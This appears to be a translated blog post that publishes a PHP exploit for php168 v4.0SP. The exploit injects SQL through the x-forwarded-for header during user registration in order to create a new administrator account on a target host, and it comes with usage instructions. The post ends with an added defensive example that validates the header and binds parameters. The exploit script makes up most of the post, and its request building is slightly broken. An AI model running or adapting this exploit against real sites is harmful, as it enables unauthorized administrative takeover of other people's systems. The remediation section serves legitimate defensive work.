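Author: amxku
Source: amxku's blog
There is not much to say about the cause of the vulnerability itself: it is the age-old x-forwarded-for problem, and I think many people have already found this vulnerability.
Because this vulnerability has been around for a while and I only tested it on a PC at the time, there may be some errors; anyone interested can look into it themselves.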
<?php
print_r("
+------------------------------------------------------------------+
Create New Admin Exploit For php168 v4.0SP/n
amxku.net
+------------------------------------------------------------------+
");
if ($argc<4) {
    echo "Usage: php ".$argv[0]." host path uid/n";
    echo "host: target server /n";
    echo "path: path to php168/n";
    echo "uid: the user uid/n";
    echo "Example:";
    echo "php ".$argv[0]." www.php168.com / 123345/n";
    die;
}
$host=$argv[1];
$path=$argv[2];
$id=$argv[3]+2;
$cmd = "xxxx','0','111','0','1','', '', '123', '123', '123', '123', '0', '', '0', '', '', '', ''),('".$id."', '0', '3', '', '1', '0', '', '1', '1', '1', '1', '1', '1', '1', '', '', '1', '1', '1', '1', '0', '', '0', '', '', '', '')/*";
$content_1= "username=amxku&[email protected]&password=longze&password2=longze&bday_y=&bday_m=&bday_d=&sex=0&oicq=&msn=&homepage=&Submit3=%CC%E1+%BD%BB&step=2";
$content_2= "username=amxku&[email protected]&password=longze&password2=longze&bday_y=&bday_m=&bday_d=&sex=0&oicq=&msn=&homepage=&Submit3=%CC%E1+%BD%BB&step=2";
senddate($content_1);
senddate($content_2);
function senddate($content){
    global $path,$host,$cmd;
    $data = "POST ".$path."reg.php"." HTTP/1.1";
    $data .= "Accept: */*";
    $data .= "Accept-Language: zh-cn";
    $data .= "Content-Type: application/x-www-form-urlencoded";
    $data .= "User-Agent: Mozilla/4.0";
    $data .= "Host: ".$host."";
    $data .= "x-forwarded-for: ".$cmd."";
    $data .= "Content-length: ".strlen($content)."";
    $data .= "Connection: Keep-Alive";
    $data .= "";
    $data .= $content."";
    $sendto=fsockopen($host,80);
    if (!$sendto) {
        echo 'No response from '.$host;
        die;
    }
    fputs($sendto,$data);
    fclose($sendto);
};
echo "Create a successful administrator/n amxku.net";
?>
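The root cause named above is a client-supplied x-forwarded-for value reaching an SQL INSERT unchecked. The following is an added example, not code from the original post or from php168, showing the two fixes a registration handler needs: validate the header as an IP address and bind it as a parameter. The names `TRUSTED_PROXIES`, `client_ip`, `register_user` and the `members` table are hypothetical, the sample requests are constructed, and the script assumes the `pdo_sqlite` extension is available.

```php
<?php
// Added example; every name below is hypothetical, not php168's own schema or API.
const TRUSTED_PROXIES = ['10.0.0.5']; // constructed: reverse proxies you operate

// Return a validated client IP. X-Forwarded-For is honoured only when the TCP
// peer is a known proxy, and it is never returned without validation.
function client_ip(array $server): string
{
    $peer = $server['REMOTE_ADDR'] ?? '';
    if (in_array($peer, TRUSTED_PROXIES, true) && isset($server['HTTP_X_FORWARDED_FOR'])) {
        // Use the right-most entry: the one appended by our own proxy.
        $parts = explode(',', $server['HTTP_X_FORWARDED_FOR']);
        $candidate = trim(end($parts));
        if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
            return $candidate;
        }
    }
    return filter_var($peer, FILTER_VALIDATE_IP) !== false ? $peer : '0.0.0.0';
}

function register_user(PDO $db, string $username, string $ip): void
{
    // Bound parameters keep the value out of the SQL text entirely.
    $stmt = $db->prepare('INSERT INTO members (username, regip) VALUES (?, ?)');
    $stmt->execute([$username, $ip]);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE members (username TEXT, regip TEXT)');

// Constructed requests: a non-IP header sent directly, the same via the proxy,
// and a well-formed header via the proxy.
$requests = [
    ['REMOTE_ADDR' => '203.0.113.9', 'HTTP_X_FORWARDED_FOR' => "not-an-ip','x"],
    ['REMOTE_ADDR' => '10.0.0.5',    'HTTP_X_FORWARDED_FOR' => "not-an-ip','x"],
    ['REMOTE_ADDR' => '10.0.0.5',    'HTTP_X_FORWARDED_FOR' => '198.51.100.7'],
];
foreach ($requests as $i => $server) {
    register_user($db, "user$i", client_ip($server));
}
foreach ($db->query('SELECT username, regip FROM members') as $row) {
    echo $row['username'], ' ', $row['regip'], PHP_EOL;
}
```

In each case the stored `regip` is a syntactically valid address, and the table ends up with exactly one row per registration.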